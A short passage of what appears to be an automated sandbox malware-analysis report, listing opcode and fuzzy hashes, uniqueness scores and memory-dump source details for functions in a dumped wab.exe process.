• Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
• Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
• Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
• Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
• Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
• Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
Uniqueness
Uniqueness Score: -1.00%